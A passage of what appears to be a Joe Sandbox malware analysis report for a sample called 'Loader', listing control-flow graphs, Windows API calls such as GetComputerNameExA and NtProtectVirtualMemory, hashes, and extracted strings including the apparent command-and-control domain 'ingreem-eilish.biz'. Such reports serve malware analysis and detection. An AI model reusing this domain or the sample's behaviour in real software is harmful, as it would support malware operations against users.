423e19-423e32 531->544 545 423f79-423f87 call 407eb0 531->545 533 423ce0-423cef 532->533 533->531 533->533 536->542 537->539 538->504 539->544 540->537 541->540 542->545 550 4240e0-4240e5 543->550 551 4240e7 543->551 549 423e40-423e70 544->549 545->538 549->549 556 423e72-423eeb 549->556 555 4240ea-424109 call 407ea0 550->555 551->555 564 424110 555->564 557 423ef0-423f3d 556->557 557->557 559 423f3f-423f5a call 421730 557->559 559->536 564->564
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: AF$EG$IK$stu
                                                                                        • API String ID: 0-1635301703
                                                                                        • Opcode ID: 2eb72137ecd42df3155bdba8500a69820cb5c5c9371d7a7e8082faf064e55606
                                                                                        • Instruction ID: 39eb04832eb88fb9aa3c4d3716742c09fe3224a1bca5495eee59028efd12266c
                                                                                        • Opcode Fuzzy Hash: 2eb72137ecd42df3155bdba8500a69820cb5c5c9371d7a7e8082faf064e55606
                                                                                        • Instruction Fuzzy Hash: 75D168B5E00211DFDB10CF64D882A6BBB71FF46315F1581A9E941AF352E738A901CF99
                                                                                        Function 004085D0 Relevance: 7.7, APIs: 5, Instructions: 170threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 565 4085d0-4085e1 call 43bc50 568 4087e3-4087e5 ExitProcess 565->568 569 4085e7-4085ee call 434a50 565->569 572 4085f4-40861f GetCurrentProcessId GetCurrentThreadId 569->572 573 4087de call 43c2b0 569->573 575 408621-408623 572->575 576 408625-408730 SHGetSpecialFolderPathW GetForegroundWindow 572->576 573->568 575->576 577 408736-4087b8 576->577 578 4087ba-4087d2 call 409aa0 576->578 577->578 578->573 581 4087d4 call 40c5c0 578->581 583 4087d9 call 40b3c0 581->583 583->573
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004085F4
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004085FE
                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408713
                                                                                        • GetForegroundWindow.USER32 ref: 00408728
                                                                                          • Part of subcall function 0040C5C0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
                                                                                          • Part of subcall function 0040B3C0: FreeLibrary.KERNEL32(004087DE), ref: 0040B3C6
                                                                                          • Part of subcall function 0040B3C0: FreeLibrary.KERNEL32 ref: 0040B3E7
                                                                                        • ExitProcess.KERNEL32 ref: 004087E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3072701918-0
                                                                                        • Opcode ID: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                        • Instruction ID: e578a3b207df15b92ed52ca48c6c45aa0500652032070dd10f4452ae5aeaaed9
                                                                                        • Opcode Fuzzy Hash: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                        • Instruction Fuzzy Hash: 39512877F547184BC318AEB98D8636AF6C65BC4210F0E813EA985E73D1EDB89C4542C8
                                                                                        Function 0042DB7A Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 488COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 585 42db7a-42dc79 call 43dd00 588 42dc7e-42dccf GetComputerNameExA 585->588 589 42dcd0-42dcf6 588->589 589->589 590 42dcf8-42dd02 589->590 591 42dd04-42dd0f 590->591 592 42dd1d 590->592 593 42dd10-42dd19 591->593 594 42dd20-42dd2d 592->594 593->593 595 42dd1b 593->595 596 42dd4b-42dd9f GetComputerNameExA 594->596 597 42dd2f-42dd36 594->597 595->594 599 42dda0-42ddbb 596->599 598 42dd40-42dd49 597->598 598->596 598->598 599->599 600 42ddbd-42ddc7 599->600 601 42dddb-42dde8 600->601 602 42ddc9 600->602 604 42ddea-42ddf1 601->604 605 42de0b-42de5a 601->605 603 42ddd0-42ddd9 602->603 603->601 603->603 606 42de00-42de09 604->606 608 42de60-42de96 605->608 606->605 606->606 608->608 609 42de98-42dea2 608->609 610 42dea4-42deab 609->610 611 42debb-42dec8 609->611 612 42deb0-42deb9 610->612 613 42deca-42ded1 611->613 614 42deeb-42df47 call 43dd00 611->614 612->611 612->612 615 42dee0-42dee9 613->615 619 42df50-42df9c 614->619 615->614 615->615 619->619 620 42df9e-42dfa8 619->620 621 42dfaa-42dfb1 620->621 622 42dfcb-42dfe5 620->622 623 42dfc0-42dfc9 621->623 624 42e10a-42e14a 622->624 625 42dfeb-42dff2 622->625 623->622 623->623 627 42e150-42e1a2 624->627 626 42e000-42e00a 625->626 628 42e020-42e026 626->628 629 42e00c-42e011 626->629 627->627 630 42e1a4-42e1b5 627->630 632 42e050-42e05c 628->632 633 42e028-42e02b 628->633 631 42e0b0-42e0b9 629->631 634 42e1b7-42e1c5 630->634 635 42e1dd 630->635 641 42e0bb-42e0c1 631->641 638 42e05e-42e061 632->638 639 42e0cd-42e0d5 632->639 633->632 636 42e02d-42e042 633->636 637 42e1d0-42e1d9 634->637 640 42e1e4-42e1e7 call 4309d0 635->640 636->631 637->637 645 42e1db 637->645 638->639 646 42e063-42e0a5 638->646 643 42e0d7-42e0dc 639->643 644 42e0de-42e0e1 639->644 648 42e1ec-42e20c 640->648 641->624 642 42e0c3-42e0c5 641->642 642->626 649 42e0cb 642->649 643->641 650 42e0e3-42e104 644->650 651 42e106-42e108 644->651 645->640 646->631 649->624 650->631 651->631
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DCA2
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042DD66
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: _$uHHs
                                                                                        • API String ID: 3545744682-2879388440
                                                                                        • Opcode ID: fff4d2ae5a9090df37eee2bfda5c873a54dc35febac4667e5f7cefb26893c0c6
                                                                                        • Instruction ID: 6fef95053ab342754befd2ad3e4f8b718065d38dd91b4b55b8e1a17b79ce2dd8
                                                                                        • Opcode Fuzzy Hash: fff4d2ae5a9090df37eee2bfda5c873a54dc35febac4667e5f7cefb26893c0c6
                                                                                        • Instruction Fuzzy Hash: E4E127206183E08ED735CB3994917BBBBD1AFA7304F58896ED4D98B382C739850AC757
                                                                                        Function 0040A8C0 Relevance: 6.6, Strings: 5, Instructions: 384COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 652 40a8c0-40a8ef 653 40a8f0-40a909 652->653 653->653 654 40a90b-40aa02 653->654 655 40aa10-40aa2e 654->655 655->655 656 40aa30-40aa51 655->656 657 40aa60-40aa9b 656->657 657->657 658 40aa9d-40aab4 call 40b3f0 657->658 660 40aab9-40aac0 658->660 661 40aac6-40aad4 660->661 662 40ad2a-40ad36 660->662 663 40aae0-40aafa 661->663 663->663 664 40aafc-40ab02 663->664 665 40ab10-40ab1a 664->665 666 40ab21-40ab25 665->666 667 40ab1c-40ab1f 665->667 668 40ad21-40ad27 call 43a940 666->668 669 40ab2b-40ab3f 666->669 667->665 667->666 668->662 671 40ab40-40ab52 669->671 671->671 673 40ab54-40ab60 671->673 674 40ab62-40ab6d 673->674 675 40ab94-40ab98 673->675 678 40ab77-40ab7b 674->678 676 40ad1c-40ad1e 675->676 677 40ab9e-40abc9 675->677 676->668 679 40abd0-40abf4 677->679 678->676 680 40ab81-40ab88 678->680 679->679 683 40abf6-40abfd 679->683 681 40ab8a-40ab8c 680->681 682 40ab8e 680->682 681->682 684 40ab70-40ab75 682->684 685 40ab90-40ab92 682->685 686 40ac34-40ac36 683->686 687 40abff-40ac0a 683->687 684->675 684->678 685->684 686->676 689 40ac3c-40ac52 686->689 688 40ac17-40ac1b 687->688 688->676 691 40ac21-40ac28 688->691 690 40ac60-40acad 689->690 690->690 692 40acaf-40acb9 690->692 693 40ac2a-40ac2c 691->693 694 40ac2e 691->694 695 40acf3-40acf5 692->695 696 40acbb-40acc3 692->696 693->694 697 40ac10-40ac15 694->697 698 40ac30-40ac32 694->698 700 40acfb-40ad1a call 40a630 695->700 699 40acd7-40acdc 696->699 697->686 697->688 698->697 699->676 701 40acde-40ace5 699->701 700->668 703 40ace7-40ace9 701->703 704 40aceb 701->704 703->704 706 40acd0-40acd5 704->706 707 40aced-40acf1 704->707 706->699 708 40acf7-40acf9 706->708 707->706 708->676 708->700
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $>$$>$/ $@G$xA
                                                                                        • API String ID: 0-3945432221
                                                                                        • Opcode ID: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
                                                                                        • Instruction ID: 55ac8b7e195ada22395993ae97bb18e0f83c644d7aeb54a7be5ab8cf0bb5c33f
                                                                                        • Opcode Fuzzy Hash: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
                                                                                        • Instruction Fuzzy Hash: AFB1167520C3508BD324CF1884906AFBBE2EFC2704F18497DE9D12B381D679995AD78B
                                                                                        Function 00AFF5C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104nativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 709 aff5c0-aff61b call afeed0 call afebf0 NtProtectVirtualMemory 714 aff629-aff636 709->714 715 aff70c-aff70f 714->715 716 aff63c-aff681 714->716 717 aff6a6-aff6ae 716->717 718 aff683-aff68c 716->718 721 aff6b9 717->721 722 aff6b0-aff6b7 717->722 719 aff68e-aff695 718->719 720 aff697 718->720 723 aff69e-aff6a4 719->723 720->723 724 aff6c0-aff6c3 721->724 722->724 725 aff6c6-aff6cf 723->725 724->725 726 aff6dc-aff707 call afeed0 call afebf0 NtProtectVirtualMemory 725->726 727 aff6d1-aff6d9 725->727 732 aff61d-aff625 726->732 727->726 732->714
                                                                                        APIs
                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000002,00000000,00000000,00000000,082962C8,?,?,00AFE8E1,?,00000000,?), ref: 00AFF601
                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,00AFE8E1,00000000,00000000,00000000,00000000,082962C8,?,?,00AFE8E1,?,00000000,?), ref: 00AFF703
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711504076.0000000000AFE000.00000040.00000010.00020000.00000000.sdmp, Offset: 00AFE000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_afe000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-3916222277
                                                                                        • Opcode ID: 7c3c623b9836fa83dbdc5394a12b48ed3865b76677a6f9c3d53535781c8631a1
                                                                                        • Instruction ID: 8b9e0ee6cff83f9f7740722dbac45e82544ea5c26c6e0d65c522bce420e6308c
                                                                                        • Opcode Fuzzy Hash: 7c3c623b9836fa83dbdc5394a12b48ed3865b76677a6f9c3d53535781c8631a1
                                                                                        • Instruction Fuzzy Hash: 774115B1D0020DABDB04CFD4C981AFEBBB5EF58310F20855AE915AB291D7389A41DBA0
                                                                                        Function 0040D120 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 312COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 733 40d120-40d152 call 409600 CoUninitialize 736 40d160-40d191 733->736 736->736 737 40d193-40d1a3 736->737 738 40d1b0-40d1ef 737->738 738->738 739 40d1f1-40d24f 738->739 740 40d250-40d273 739->740 740->740 741 40d275-40d286 740->741 742 40d288 741->742 743 40d29b-40d2a3 741->743 746 40d290-40d299 742->746 744 40d2a5-40d2a6 743->744 745 40d2bb-40d2c5 743->745 747 40d2b0-40d2b9 744->747 748 40d2c7-40d2cb 745->748 749 40d2db-40d2e3 745->749 746->743 746->746 747->745 747->747 750 40d2d0-40d2d9 748->750 751 40d2e5-40d2e6 749->751 752 40d2fb-40d305 749->752 750->749 750->750 753 40d2f0-40d2f9 751->753 754 40d307-40d30b 752->754 755 40d31b-40d327 752->755 753->752 753->753 756 40d310-40d319 754->756 757 40d341-40d46f 755->757 758 40d329-40d32b 755->758 756->755 756->756 759 40d470-40d4a3 757->759 760 40d330-40d33d 758->760 759->759 761 40d4a5-40d4be 759->761 760->760 762 40d33f 760->762 763 40d4c0-40d50f 761->763 762->757 763->763 764 40d511-40d53c call 40b3f0 763->764 766 40d541-40d557 764->766
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Uninitialize
                                                                                        • String ID: D$ingreem-eilish.biz
                                                                                        • API String ID: 3861434553-1775330692
                                                                                        • Opcode ID: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
                                                                                        • Instruction ID: db83cc6d0157fc327276ba6685622738ae1c34c2f9734926ad1cda59646cf540
                                                                                        • Opcode Fuzzy Hash: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
                                                                                        • Instruction Fuzzy Hash: 8BA110B55083928FD335CF2584A07EBBBE1AFD6300F0889ADD0D95B392D775490ACB96
                                                                                        Function 0040C63C Relevance: 4.4, Strings: 3, Instructions: 602COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 836 40c63c-40c64b 837 40c650-40c6ab 836->837 837->837 838 40c6ad-40c6e2 call 408540 call 437bc0 837->838 843 40c6f0-40c715 838->843 843->843 844 40c717-40c77a 843->844 845 40c780-40c7b7 844->845 845->845 846 40c7b9-40c7ca 845->846 847 40c7eb-40c7f3 846->847 848 40c7cc-40c7d3 846->848 850 40c7f5-40c7f6 847->850 851 40c80b-40c818 847->851 849 40c7e0-40c7e9 848->849 849->847 849->849 852 40c800-40c809 850->852 853 40c81a-40c821 851->853 854 40c83b-40c843 851->854 852->851 852->852 855 40c830-40c839 853->855 856 40c845-40c846 854->856 857 40c85b-40c976 854->857 855->854 855->855 858 40c850-40c859 856->858 859 40c980-40c9a7 857->859 858->857 858->858 859->859 860 40c9a9-40c9d3 859->860 861 40c9e0-40ca22 860->861 861->861 862 40ca24-40ca76 call 40b3f0 861->862 865 40ca80-40cadb 862->865 865->865 866 40cadd-40cb11 call 408540 call 437bc0 865->866 871 40cb20-40cb46 866->871 871->871 872 40cb48-40cbab 871->872 873 40cbb0-40cbe8 872->873 873->873 874 40cbea-40cbfb 873->874 875 40cc0b-40cc13 874->875 876 40cbfd-40cbff 874->876 878 40cc15-40cc16 875->878 879 40cc2b-40cc38 875->879 877 40cc00-40cc09 876->877 877->875 877->877 880 40cc20-40cc29 878->880 881 40cc3a-40cc41 879->881 882 40cc5b-40cc63 879->882 880->879 880->880 883 40cc50-40cc59 881->883 884 40cc65-40cc66 882->884 885 40cc7b-40cda7 882->885 883->882 883->883 886 40cc70-40cc79 884->886 887 40cdb0-40cdd7 885->887 886->885 886->886 887->887 888 40cdd9-40ce09 887->888 889 40ce10-40ce52 888->889 889->889 890 40ce54-40ce80 call 40b3f0 889->890 892 40ce85-40ce9b 890->892
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: A313BACE34A2B05E25E054D164A37606$^_$ingreem-eilish.biz
                                                                                        • API String ID: 0-2128005225
                                                                                        • Opcode ID: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
                                                                                        • Instruction ID: dd9baf14083705404bbb6167aa7354d43b480db8533e0b19abc2341ccbf856c6
                                                                                        • Opcode Fuzzy Hash: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
                                                                                        • Instruction Fuzzy Hash: C1020DB158E3928AD334CF2594907EBBBE1EBD6304F088A6DC4D91B342D7390909DBD6
                                                                                        Function 004272D0 Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: I^]J$x[EH
                                                                                        • API String ID: 2994545307-931091327
                                                                                        • Opcode ID: 4e1ec0b169b6dcf0a4e6d7fa1cb01984c62396cfd1de7dbf6d19737dd4ec8ffb
                                                                                        • Instruction ID: 0d59b06c8e91c5b12f8e4cbbc2a541ab03e5ca24646f09e67a505f6169a2a813
                                                                                        • Opcode Fuzzy Hash: 4e1ec0b169b6dcf0a4e6d7fa1cb01984c62396cfd1de7dbf6d19737dd4ec8ffb
                                                                                        • Instruction Fuzzy Hash: 34C16772B0C3208FD714DF18E84166BF792EF95314F99866EE8859B352E638EC05C396
                                                                                        Function 00AFF080 Relevance: 1.7, APIs: 1, Instructions: 162memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000004,00000000,00000000,6793C34C), ref: 00AFF102
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711504076.0000000000AFE000.00000040.00000010.00020000.00000000.sdmp, Offset: 00AFE000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_afe000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: 0bfa60c63f50ef171a0b56c2a5d9744cc2ad877c89f3882ce56d9e2bbd017102
                                                                                        • Instruction ID: e6728fc90bb704eec32cc890a68a7c39b3f85d1edc196c62c10a355cb1e7e1a2
                                                                                        • Opcode Fuzzy Hash: 0bfa60c63f50ef171a0b56c2a5d9744cc2ad877c89f3882ce56d9e2bbd017102
                                                                                        • Instruction Fuzzy Hash: 86612B74E00219AFDB04DFD4C981BFEB7B5EF48710F108669FA11AB291D7749A81CB64
                                                                                        Function 0041729C Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dbaf5d9c8caaa7c5158d2595a28ce29fc5bd8e40705b8776bee6581b76162ea9
                                                                                        • Instruction ID: d8ae4f8807f609b1a5a26eceed683d5d1279bcb46be8d1f2b9ff2bc753f575a8
                                                                                        • Opcode Fuzzy Hash: dbaf5d9c8caaa7c5158d2595a28ce29fc5bd8e40705b8776bee6581b76162ea9
                                                                                        • Instruction Fuzzy Hash: 3C51B2B1A0C2429FD718CF14C4916AFBBE1AB95304F158D2EE49A87342E734D989CB96
                                                                                        Function 0043F5E0 Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-3019521637
                                                                                        • Opcode ID: 69a25194109935b678ce6e24f6a27be231c29ec83bfc9dcd4c79a5b98e90c7f3
                                                                                        • Instruction ID: 6aed45fb233aa2c4fcd704149bf514c963fdf9759b22d2805e031f74d6e47680
                                                                                        • Opcode Fuzzy Hash: 69a25194109935b678ce6e24f6a27be231c29ec83bfc9dcd4c79a5b98e90c7f3
                                                                                        • Instruction Fuzzy Hash: 4FA11632A183115FC718DF28C89166BB7E2EB99314F19983EE8D5C7351D639EC0A8786
                                                                                        Function 0043C330 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                        Function 0043EB50 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: @
                                                                                        • API String ID: 2994545307-2766056989
                                                                                        • Opcode ID: b9638b10435d8128a6d4a9257ea43f928eefba0deeac915a18477b2125f410db
                                                                                        • Instruction ID: c497bc3c17aefed4a2b0ec07c899be2d1253584fb416e3315b0134f03c6467ad
                                                                                        • Opcode Fuzzy Hash: b9638b10435d8128a6d4a9257ea43f928eefba0deeac915a18477b2125f410db
                                                                                        • Instruction Fuzzy Hash: 5A3102721083009FC314DF58D8C166BB7F5FB8A314F19982DEA85873A1D339A918CB6A
                                                                                        Function 004377E0 Relevance: .3, Instructions: 328COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
